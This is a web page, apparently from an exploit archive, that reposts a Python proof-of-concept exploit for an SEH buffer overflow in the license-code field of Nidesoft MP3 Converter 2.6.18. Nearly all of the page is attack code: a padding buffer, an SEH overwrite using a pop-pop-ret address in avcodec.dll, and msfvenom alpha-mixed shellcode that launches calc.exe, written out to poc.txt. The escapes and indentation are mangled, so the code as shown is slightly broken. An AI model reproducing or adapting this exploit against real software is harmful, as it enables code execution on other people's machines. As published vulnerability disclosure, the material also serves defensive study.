Home / os / winmobile

Nidesoft MP3 Converter 2.6.18 Buffer Overflow

Posted on 15 December 2016

#!python
#####################################################################################
# Exploit title: MP3 converter v 2.6.18 License code SEH exploit
# Date: 2016-12-15
# Vendor homepage: http://www.nidesoft.com/mp3-converter.html
# Download: http://www.nidesoft.com/downloads/mp3-converter.exe
# Tested on: Win7 SP1
# Author: malwrforensics
# Details: Launch program and enter the license code in the "Register" window
# Copy&Paste the "license" from poc.txt
#####################################################################################

def write_poc(fname, buffer):
fhandle = open(fname , 'wb')
fhandle.write(buffer)
fhandle.close()

fname="poc.txt"
buf = 'x41' * 0x176c

###################################
#msfvenom --payload windows/exec
#cmd=calc.exe --platform windows
#-f python -e x86/alpha_mixed
##################################
shellcode = ""
shellcode += "x89xe0xdaxdcxd9x70xf4x59x49x49x49x49x49"
shellcode += "x49x49x49x49x49x49x43x43x43x43x43x43x37"
shellcode += "x51x5ax6ax41x58x50x30x41x30x41x6bx41x41"
shellcode += "x51x32x41x42x32x42x42x30x42x42x41x42x58"
shellcode += "x50x38x41x42x75x4ax49x39x6cx58x68x4dx52"
shellcode += "x37x70x63x30x33x30x75x30x4bx39x59x75x45"
shellcode += "x61x79x50x70x64x4cx4bx42x70x36x50x4cx4b"
shellcode += "x42x72x66x6cx6ex6bx66x32x66x74x6cx4bx74"
shellcode += "x32x37x58x34x4fx4dx67x61x5ax45x76x75x61"
shellcode += "x69x6fx4ex4cx77x4cx43x51x63x4cx54x42x66"
shellcode += "x4cx75x70x39x51x48x4fx46x6dx67x71x4bx77"
shellcode += "x7ax42x48x72x63x62x30x57x6ex6bx51x42x74"
shellcode += "x50x4cx4bx61x5ax77x4cx6cx4bx52x6cx57x61"
shellcode += "x62x58x7ax43x53x78x45x51x68x51x43x61x4c"
shellcode += "x4bx72x79x55x70x56x61x38x53x4ex6bx67x39"
shellcode += "x46x78x5ax43x65x6ax37x39x4cx4bx36x54x6e"
shellcode += "x6bx57x71x7ax76x44x71x49x6fx6ex4cx6fx31"
shellcode += "x58x4fx36x6dx56x61x48x47x66x58x39x70x73"
shellcode += "x45x69x66x66x63x53x4dx5ax58x47x4bx53x4d"
shellcode += "x65x74x34x35x6dx34x70x58x6cx4bx61x48x35"
shellcode += "x74x53x31x69x43x65x36x4ex6bx74x4cx30x4b"
shellcode += "x4cx4bx46x38x67x6cx35x51x48x53x6ex6bx35"
shellcode += "x54x6ex6bx65x51x7ax70x4fx79x37x34x45x74"
shellcode += "x75x74x43x6bx33x6bx33x51x73x69x51x4ax36"
shellcode += "x31x6bx4fx39x70x51x4fx43x6fx73x6ax6ex6b"
shellcode += "x54x52x6ax4bx4ex6dx53x6dx51x7ax77x71x4c"
shellcode += "x4dx6cx45x4ex52x53x30x47x70x75x50x52x70"
shellcode += "x45x38x54x71x4ex6bx70x6fx6ex67x39x6fx58"
shellcode += "x55x4dx6bx4ax50x78x35x4dx72x36x36x43x58"
shellcode += "x79x36x7ax35x6fx4dx4dx4dx4bx4fx79x45x37"
shellcode += "x4cx77x76x51x6cx75x5ax6bx30x79x6bx49x70"
shellcode += "x62x55x37x75x6dx6bx61x57x35x43x74x32x52"
shellcode += "x4fx30x6ax55x50x31x43x4bx4fx69x45x32x43"
shellcode += "x43x51x32x4cx50x63x34x6ex61x75x62x58x50"
shellcode += "x65x67x70x41x41"

junk = 'x41' * 0x1e
jmp = 'xebx20x41x41'
nseh = 'x37x27x78x66' #pop pop ret -> avcodec.dll
buffer = buf + jmp + nseh + junk + shellcode
write_poc(fname, buffer)

 

TOP

Malware :

Exploits :